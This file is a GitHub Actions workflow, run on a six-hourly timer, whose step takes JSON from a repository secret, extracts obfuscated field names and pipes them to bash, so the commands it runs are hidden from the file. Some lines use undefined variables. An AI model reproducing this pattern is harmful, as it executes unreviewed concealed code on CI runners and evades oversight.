name: dongruzhuo1756
on:
  workflow_dispatch:
  schedule:
    - cron: '55 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: dongruzhuo1756
        env:
          g24231: ${{ secrets.g24231 }}
        run: |
          echo $g24231 | jq -r .ardt56 | /bin/bash
          echo $gb5 | jq -r .n954 | /bin/bash
          echo $bmdy2434 | jq -r .o9 | /bin/bash
          echo $rhajm8 | jq -r .nowr3 | /bin/bash

